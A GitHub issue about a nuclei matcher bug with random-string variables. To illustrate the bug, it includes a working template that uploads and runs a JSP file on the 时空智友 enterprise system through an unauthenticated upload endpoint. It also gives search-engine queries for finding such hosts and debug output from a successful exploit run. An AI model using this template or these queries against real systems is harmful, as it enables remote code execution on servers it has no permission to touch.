nuclei icon indicating copy to clipboard operation
nuclei copied to clipboard

Published 20 hours ago verified publisher icon projectdiscovery

Fixed strings can be matched but random strings cannot be matched

Open HuTa0kj opened this issue 1 year ago • 5 comments

Nuclei version: 3.1.2

Current Behavior:

When I was using a template matching vulnerability, I found that when I used a fixed string, nuclei could match the vulnerability. If I used the string obtained by the random function random_str: "{{rand_base(8)}}", will not be matched. And in -debug, the content I need to match has been echoed.

zoomeye-query: app:"时空智友企业流程化管控系统"
http-general-query: iconhash: "2464cbce5dd2681dd4fb62d055520d78" || title:"时空智友"

My Template:

id: test
info:
  name: test
  author: Blame Team
  severity: high
  description: ''
  reference: []
  classification:
    cvss-metrics: ''
    cvss-score: 0.0
    cve-id: ''
    cwe-id: ''
  tags: ''

variables:
  random_str: "yeNidoSe"
  # random_str: "{{rand_base(8)}}"
  command: '<% out.println("{{random_str}}");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>'
  url_encoding_str: "{{url_encode(command)}}"

requests:
  - raw:
      - |
        POST /formservice?service=updater.uploadStudioFile HTTP/1.1
        Content-Type: application/x-www-form-urlencoded

        content=<?xml%20version="1.0"?><root><filename>{{randstr}}.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01%2008:00:00</lmtime></root><!--{{url_encoding_str}} -->

      - |
        GET /update/temp/studio/{{randstr}}.jsp HTTP/1.1

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200"
          - "contains(body_2, '{{random_str}}')"
        condition: and

Expected Behavior:

Use random numbers and match successfully.

Steps To Reproduce:

1.run nuclei -t ./tmp/test.yaml -u http://x.x.x.x -debug

Match results

HTTP/1.1 200 OK
Connection: close
Content-Length: 187
Content-Type: text/html
Date: Thu, 21 Dec 2023 07:59:25 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=74CF3027EEA655617A6A3D7FE95BFA8C; Path=/

<?xml version="1.0"?><root><filename>9ZqNHfXhTdefbkRPdoow7IDin0h.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01 08:00:00</lmtime></root><!--yeNidoSe
 -->
[test:dsl-1] [http] [high] http://x.x.x.x/update/temp/studio/9ZqNHfXhTdefbkRPdoow7IDin0h.jsp

2.Comment random_str: "yeNidoSe". Use random_str: "{{rand_base(8)}}". 3.run nuclei -t ./tmp/test.yaml -u http://x.x.x.x -debug

Match results

HTTP/1.1 200 OK
Connection: close
Content-Length: 187
Content-Type: text/html
Date: Thu, 21 Dec 2023 07:59:15 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C1C260C9D15F311763C63BF660EF275C; Path=/

<?xml version="1.0"?><root><filename>3ZqNG9gFF8dCluAs0QFVey0N0JA.jsp</filename><filepath>./</filepath><filesize>172</filesize><lmtime>1970-01-01 08:00:00</lmtime></root><!--n0UpLwQA
 -->
[INF] No results found. Better luck next time!

In debug, I saw the value n0UpLwQA that I needed to match, but unfortunately nuclei did not show that the match was successful.

Anything else:

  • Matching failed using versions 3.1.2 and 3.1.0, but matching was successful in version 2.8.9.
  • I'm not using any other random functions other than rand_base

Thank you all!

HuTa0kj avatar Dec 21 '23 08:12 HuTa0kj

maybe this is a dupe of #4405?

jimen0 avatar Dec 23 '23 21:12 jimen0

maybe this is a dupe of #4405?

@jimen0 Thank you for your attention, after my testing, this is not the same problem, the random number I generated is the same as the random number I matched. image

HuTa0kj avatar Dec 24 '23 05:12 HuTa0kj

解决了么

anquanscan avatar Dec 29 '23 21:12 anquanscan

I've encountered this issue as well.

Current Behavio:

In version 3.1.3, the DSL matcher fails to correctly match custom variables used within functions, while the word matcher works fine.

In theory, both the DSL matcher and the word matcher should yield the same results for custom variables. However, in my usage, the results for my custom variable {{Time}} are significantly different between the two.

Here's my template (with some content omitted for readability):

variables:
  Time: '{{date_time("%Y-%M-%D")}}'

http:
  - raw:
      - |+
        POST /emap/webservice/gis/soap/poi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        ……

      - |
        GET /upload/{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}
    
    req-condition: true
    
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains_all(body_1, "soap", "Envelope", "Body", "xmlns", "code")'
        condition: and

#      - type: dsl
#        dsl:
#          - "contains(body_2, '{{Time}}')"
#        condition: and

      - type: word
        words:
          - "{{Time}}"
        part: body_2

kenyon-wong avatar Jan 02 '24 07:01 kenyon-wong

解决了么

No

HuTa0kj avatar Jan 02 '24 11:01 HuTa0kj